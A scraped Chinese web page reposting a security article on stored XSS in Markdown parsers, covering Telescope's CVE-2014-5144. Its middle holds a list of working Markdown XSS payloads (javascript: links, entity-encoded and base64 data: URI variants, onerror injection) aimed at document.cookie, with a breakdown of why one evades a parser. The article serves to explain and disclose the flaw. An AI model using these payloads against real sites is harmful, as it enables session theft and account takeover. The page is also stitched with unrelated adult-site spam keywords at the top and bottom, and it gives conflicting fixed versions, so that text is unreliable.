成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

漏洞分析:一個Markdown解析器的持久型XSS漏洞

安全 應(yīng)用安全 漏洞
Markdow解析器的安全現(xiàn)狀如何?有沒有對用戶輸入的數(shù)據(jù)做過濾?事實上,很多markdown解析器都沒有過濾用戶輸入的數(shù)據(jù),那么如果markdown被用于添加用戶評論等功能的時候,就有可能存在安全風險。

什么是Markdown?

Markdown是一種輕量級的標記語言,流行程度已經(jīng)得到了GitHub和Stack Overflow的廣泛支持,作為普通人我們也可以輕松上手。

[[127667]]

用markdown來寫文章非常贊,那些瑣碎的HTML標簽都可以拋到腦后不用管。最近5年內(nèi),markdown收到非常多的關(guān)注,包括Reddit,Github,StackOverflow在內(nèi)的很多應(yīng)用都使用 markdown這也催生了很多的markdown解析器的產(chǎn)生,這里定義了一些markdown語法,語法約定markdown解析器將這些標簽解析為html標簽。

漏洞分析:一個Markdown解析器的持久型XSS漏洞

Markdown安全現(xiàn)狀

Markdown解析器的安全現(xiàn)狀如何?有沒有對用戶輸入的數(shù)據(jù)做過濾?

事實上,很多markdown解析器都沒有過濾用戶輸入的數(shù)據(jù),那么如果markdown被用于添加用戶評論等功能的時候,就有可能存在安全風險。

這里有一些關(guān)于這個問題的討論:[1], [2], [3].

另外,如果用googe搜索一下:

markdown xss issue site:github.com

漏洞分析:一個Markdown解析器的持久型XSS漏洞

你就會發(fā)現(xiàn)github上又很多***很高的項目都被發(fā)現(xiàn)存在XSS 漏洞。

所以,如何構(gòu)造一些payload呢?看下面這些:

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a&#039;"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

上面這些payload是由Aleksa和原文作者一起搞出來的。在過去的12個月內(nèi),在實際滲透測試中證明,上面的這些 payload 是有效的。并且很多 markdown 解析器都受到影響。來看一下***一個payload:

[test](javascript://%0d%0aprompt(1);com)

我們猜測,markdown 解析器可能通過如下幾個步驟來進行解析&轉(zhuǎn)換:

判斷時候有協(xié)議頭?//有javascript 偽協(xié)議,Y

hostname 是以常見的域名后綴(com, org)結(jié)尾的?//是的,以 com 結(jié)尾 Y

將上述 payload 轉(zhuǎn)換為 HTML 標簽,//結(jié)果如下

  1. <a href="javascript://%0d%0aprompt(1);com>test</a> 

成功構(gòu)造了一個XSS payload!當點擊了上述鏈接后,就會觸發(fā)XSS!

Telescope解析器一個持久性 XSS 漏洞(CVE-2014-5144)

Telescope是一個有名的開源項目,類似Reddit和Hackernews一樣,提供一個社區(qū)功能。Telescope的一個解析帖子&評論的功能存在 XSS 漏洞,并且這個功能存在很久了!

在0.9.3之前的版本中,以上面的 payload 列表中的 payload 發(fā)帖或者發(fā)表評論,就可以導致一個XSS漏洞。該漏洞已經(jīng)修復(fù),Telescope在這里發(fā)了changelog:http://www.telesc.pe/blog/telescope-v093-dailyscope/

下面是漏洞對應(yīng)的payload:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

漏洞分析:一個Markdown解析器的持久型XSS漏洞 

漏洞分析:一個Markdown解析器的持久型XSS漏洞

注意:上述漏洞已經(jīng)在Telescope >= 0.7.3版本中修復(fù)了。

責任編輯:藍雨淚 來源: FreeBuf
相關(guān)推薦

2019-03-25 07:27:14

XSS漏洞Ecshop

2014-07-03 10:01:40

XSS漏洞存儲型XSS漏洞

2013-11-27 17:12:27

2011-07-21 09:25:41

2020-12-22 10:29:43

漏洞SAML認證補丁

2022-10-20 11:00:52

SQL解析器

2009-05-07 19:02:44

2021-03-08 10:49:11

漏洞攻擊網(wǎng)絡(luò)安全

2019-07-05 08:39:39

GoSQL解析器

2013-08-07 10:00:03

XSS谷歌

2017-02-16 15:47:12

2017-02-14 10:20:43

Java Class解析器

2011-11-28 15:40:52

wiresharkRDP解析器

2023-12-31 09:06:08

2013-04-17 17:07:40

2011-01-20 17:53:56

2018-09-19 04:55:22

2016-03-03 14:29:15

2010-04-30 15:45:09

2022-06-28 08:17:10

JSON性能反射
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 18成人在线观看 | 手机av在线 | 国产精品久久久久久久久久软件 | 亚洲36d大奶网 | 欧美成人精品一区二区男人看 | 国产在线不卡视频 | 久久久久久91香蕉国产 | 久久精品中文 | 国产成人精品免高潮在线观看 | 五月婷婷丁香 | av中文字幕在线播放 | 午夜影院在线观看 | 国产一级精品毛片 | 99热在线免费| 亚洲成人99 | 国产一区二区在线播放 | 精品亚洲一区二区 | 国产视频久久久久 | 九九激情视频 | 亚洲视频 欧美视频 | 国产一区亚洲 | 久久久91精品国产一区二区三区 | 天天草av| av男人的天堂av | 国产精品海角社区在线观看 | 日韩中出| 中文字幕在线一区二区三区 | 中文字幕在线免费观看 | 久久爱综合 | 国产伦一区二区三区四区 | 国产精品福利在线 | 久久综合一区 | 日韩免费中文字幕 | 久久伊人久久 | a级黄色片在线观看 | 免费在线观看一区二区 | 亚洲男女激情 | 亚洲不卡在线观看 | 99精品一区 | 天天操操| 中文字幕三区 |